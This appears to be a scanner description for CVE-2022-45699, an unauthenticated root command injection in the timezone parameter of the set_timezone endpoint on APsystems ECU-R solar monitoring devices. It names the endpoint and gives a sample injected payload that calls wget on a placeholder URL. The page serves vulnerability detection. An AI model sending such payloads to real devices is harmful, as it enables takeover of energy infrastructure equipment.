CVE-2022-45699 Scanner

APsystems ECU-R is an energy monitoring and communication device used in photovoltaic (solar power) systems. It manages and communicates with microinverters to monitor system performance. These devices are typically exposed on local or remote networks for administrative access.

This scanner targets a critical remote command injection vulnerability (CVE-2022-45699) present in ECU-R firmware version 5203. The flaw resides in the administration web interface, specifically the `/index.php/management/set_timezone` endpoint. The `timezone` parameter is improperly sanitized, allowing remote, unauthenticated attackers to inject and execute arbitrary system commands as **root**.

Exploitation involves sending a crafted POST request with a payload injected into the `timezone` field (e.g., `timezone=;wget+malicious-url;#`). This payload is directly interpreted by the system shell, leading to full remote code execution. The scanner confirms exploitation via [interactsh](https://github.com/projectdiscovery/interactsh) integration by checking for out-of-band HTTP interactions.

Successful exploitation can result in full device compromise, including modification of configurations, installation of backdoors, and pivoting within the local network. Because the device is often deployed in critical energy infrastructure, this vulnerability poses a significant security risk.

REFERENCES

• https://github.com/0xst4n/APSystems-ECU-R-RCE-Timezone